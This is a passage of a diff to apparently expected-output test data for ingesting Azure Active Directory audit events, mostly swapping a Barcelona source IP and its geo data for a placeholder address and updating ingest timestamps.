alue\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"KeyDescription\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"531446ed-abd2-468f-96a8-a4dcc7b05168\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:42:45.0442303Z\"},{\"Name\":\"env_epoch\",\"Value\":\"VYXPT\"},{\"Name\":\"env_seqNum\",\"Value\":\"45826385\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR559\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"20a82fa1-625b-491a-a3e8-54d779a9b17e\",\"ModifiedProperties\":[{\"Name\":\"KeyDescription\",\"NewValue\":\"[\\r\\n \\\"[KeyIdentifier=6d944a5f-234c-4879-8de4-39f089d8b96b,KeyType=AsymmetricX509Cert,KeyUsage=Verify,DisplayName=E=asr@example.net, CN=testsiem.onmicrosoft.com, OU=SIEM, O=Elastic, L=Barcelona, S=Barce]\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"KeyDescription\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application – Certificates and secrets management \",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125255600Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:42:45\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"KeyDescription\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"531446ed-abd2-468f-96a8-a4dcc7b05168\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:42:45.0442303Z\"},{\"Name\":\"env_epoch\",\"Value\":\"VYXPT\"},{\"Name\":\"env_seqNum\",\"Value\":\"45826385\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR559\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"20a82fa1-625b-491a-a3e8-54d779a9b17e\",\"ModifiedProperties\":[{\"Name\":\"KeyDescription\",\"NewValue\":\"[\\r\\n \\\"[KeyIdentifier=6d944a5f-234c-4879-8de4-39f089d8b96b,KeyType=AsymmetricX509Cert,KeyUsage=Verify,DisplayName=E=asr@example.net, CN=testsiem.onmicrosoft.com, OU=SIEM, O=Elastic, L=Barcelona, S=Barce]\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"KeyDescription\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application – Certificates and secrets management \",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -15074,25 +13778,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -15106,7 +13792,7 @@ "ObjectId": "Not Available", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -15220,7 +13906,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -15232,12 +13918,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036487100Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:42:45\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"KeyDescription\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"531446ed-abd2-468f-96a8-a4dcc7b05168\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:42:45.0442303Z\"},{\"Name\":\"env_epoch\",\"Value\":\"VYXPT\"},{\"Name\":\"env_seqNum\",\"Value\":\"45826385\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR559\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"20a82fa1-625b-491a-a3e8-54d779a9b17e\",\"ModifiedProperties\":[{\"Name\":\"KeyDescription\",\"NewValue\":\"[\\r\\n \\\"[KeyIdentifier=6d944a5f-234c-4879-8de4-39f089d8b96b,KeyType=AsymmetricX509Cert,KeyUsage=Verify,DisplayName=E=asr@example.net, CN=testsiem.onmicrosoft.com, OU=SIEM, O=Elastic, L=Barcelona, S=Barce]\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"KeyDescription\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application – Certificates and secrets management \",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125262400Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:42:45\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"KeyDescription\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"531446ed-abd2-468f-96a8-a4dcc7b05168\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:42:45.0442303Z\"},{\"Name\":\"env_epoch\",\"Value\":\"VYXPT\"},{\"Name\":\"env_seqNum\",\"Value\":\"45826385\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR559\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"20a82fa1-625b-491a-a3e8-54d779a9b17e\",\"ModifiedProperties\":[{\"Name\":\"KeyDescription\",\"NewValue\":\"[\\r\\n \\\"[KeyIdentifier=6d944a5f-234c-4879-8de4-39f089d8b96b,KeyType=AsymmetricX509Cert,KeyUsage=Verify,DisplayName=E=asr@example.net, CN=testsiem.onmicrosoft.com, OU=SIEM, O=Elastic, L=Barcelona, S=Barce]\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"KeyDescription\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application – Certificates and secrets management \",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -15263,25 +13949,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -15295,7 +13963,7 @@ "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -15418,7 +14086,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -15430,12 +14098,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036493400Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:42:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"531446ed-abd2-468f-96a8-a4dcc7b05168\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:42:45.1042022Z\"},{\"Name\":\"env_epoch\",\"Value\":\"VYXPT\"},{\"Name\":\"env_seqNum\",\"Value\":\"45826464\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR559\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"15adbe69-7974-41ec-8341-208456600ad3\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125266700Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:42:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Na